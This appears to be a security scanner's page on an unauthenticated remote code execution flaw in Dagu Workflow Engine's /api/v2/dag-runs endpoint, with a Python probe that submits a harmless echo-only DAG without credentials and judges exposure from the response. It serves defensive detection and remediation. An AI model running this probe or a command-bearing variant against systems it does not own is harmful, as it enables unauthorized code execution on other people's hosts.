Dagu Workflow Engine Remote Code Execution Scanner
Detects the Remote Code Execution (RCE) vulnerability in Dagu Workflow Engine versions up to and including 1.30.3. Identifies deployments where authentication is disabled by default, so that the DAG-run API executes shell commands for any client that can reach it, without credentials.
Short Info
Level: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 10 days 23 hours
Scan only one: Domain, Subdomain, IPv4
The Dagu Workflow Engine is a tool used to schedule and manage complex workflows for automation processes. It is used by developers and IT professionals in environments where task automation and workflow management are essential, such as software development and operations teams. By accepting and executing task sequences defined in YAML, including specifications supplied dynamically over its API, it makes routine tasks easy to automate. Dagu is particularly appealing in DevOps settings, where continuous integration and delivery pipelines are maintained. However, versions up to and including 1.30.3 ship with authentication disabled by default, which exposes every API-reachable deployment to unauthorized access. Its ease of integration into diverse environments makes it a popular choice, which in turn raises the importance of securing its deployments.
The vulnerability exists in the Dagu Workflow Engine because of an insecure default configuration that results in Remote Code Execution (RCE). With authentication disabled, unauthorized users can execute arbitrary shell commands through the affected API endpoint without presenting any credentials. The flaw is critical because it can be exploited remotely over the network with minimal effort. The endpoint in question, POST /api/v2/dag-runs, accepts an inline YAML DAG specification and runs it immediately; the shell commands it contains are executed exactly as submitted, and no authentication gate is applied by default. Running attacker-supplied commands this directly, with no safeguard in front of the endpoint, is what makes the vulnerability so severe.
The vulnerability lies in the `/api/v2/dag-runs` endpoint, which processes HTTP POST requests carrying YAML DAG specifications. Because the endpoint enforces no authentication by default, any external party that can reach the interface can exploit it by sending a crafted payload. The payload typically includes steps defining shell commands to be executed; the scanner's template demonstrates this with a step that writes data to a remote server, which confirms execution out of band. Two network conditions must hold for exploitation: the attacker must be able to reach the Dagu API, and, for an out-of-band check, the Dagu host must be able to reach the attacker's server. Dagu installations whose API is exposed beyond a trusted network, intentionally or not, are particularly susceptible.
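The following Python script is an added example of the check described above; it is not the scanner's own template and not Dagu project code. It submits a harmless single-step DAG (the step only echoes a random marker) to POST /api/v2/dag-runs with no credentials and classifies the response. It assumes that the request body carries the inline YAML in a JSON field named "dag", that an accepted run answers 200 or 201 with a JSON body containing "dagRunId", and that a deployment with authentication enabled answers 401 or 403; these field names and codes are assumptions and should be checked against the target version before relying on the verdict. Unlike the out-of-band variant the page describes, this check needs no listener, because it reads the verdict from the HTTP response itself.

```python
"""Unauthenticated probe for Dagu's POST /api/v2/dag-runs endpoint.

Added example, not the scanner template or Dagu project code.
Assumptions (also flagged below): the YAML spec travels in a JSON field
named "dag"; an accepted run returns 200/201 with a "dagRunId"; an
authenticated deployment rejects anonymous requests with 401 or 403.
The submitted DAG only echoes a random marker; it does not touch the host.
"""
import json
import secrets
import urllib.error
import urllib.request

DAG_RUNS_PATH = "/api/v2/dag-runs"
SPEC_FIELD = "dag"  # assumed name of the JSON field carrying the YAML spec


def build_dag_yaml(marker: str) -> str:
    """Return a minimal single-step DAG whose only effect is printing MARKER."""
    # A harmless canary command; an attacker would put any shell command here.
    return (
        f"name: probe-{marker}\n"
        "steps:\n"
        "  - name: canary\n"
        f"    command: echo {marker}\n"
    )


def build_request_body(marker: str) -> bytes:
    """JSON-encode the inline DAG under the assumed field name."""
    return json.dumps({SPEC_FIELD: build_dag_yaml(marker)}).encode()


def classify(status: int, body: bytes) -> str:
    """Map an HTTP response to a verdict.

    'vulnerable'   : the run was accepted without credentials
    'protected'    : the server demanded authentication
    'inconclusive' : anything else (wrong path, older API, proxy error, ...)
    """
    if status in (401, 403):
        return "protected"
    if status in (200, 201):
        try:
            data = json.loads(body or b"{}")
        except ValueError:
            return "inconclusive"
        # Assumed success shape: {"dagRunId": "..."}
        if isinstance(data, dict) and data.get("dagRunId"):
            return "vulnerable"
    return "inconclusive"


def probe(base_url: str, timeout: float = 10.0) -> str:
    """POST the canary DAG without any Authorization header and classify."""
    marker = secrets.token_hex(8)
    req = urllib.request.Request(
        base_url.rstrip("/") + DAG_RUNS_PATH,
        data=build_request_body(marker),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify(resp.status, resp.read())
    except urllib.error.HTTPError as exc:
        # 401/403/404 and friends arrive here; still worth classifying.
        return classify(exc.code, exc.read())
    except (urllib.error.URLError, OSError):
        return "inconclusive"


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    print(f"{target}: {probe(target)}")
```

Run it against a staging instance you own (for example `python probe.py http://dagu.internal:8080`). A "vulnerable" verdict means an anonymous client can enqueue and execute arbitrary shell steps; the remediation is to enable Dagu's built-in authentication (basic or token based, configured through its config file or environment; check the documentation for the exact keys in your version) and to keep the API off untrusted networks.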
Exploitation of this vulnerability can have severe consequences, ranging from unauthorized data retrieval to complete takeover of the affected system. Attackers can deploy malware or ransomware, pivot into internal networks, exfiltrate sensitive data, or disrupt services by exhausting CPU, memory or disk through runaway workflow steps. System integrity is compromised as soon as an attacker can define workflow tasks that run attacker-controlled code, since those tasks execute with the privileges of the Dagu process. Administrators should therefore enable authentication and restrict network exposure of the API to prevent unauthorized access and potential data breaches.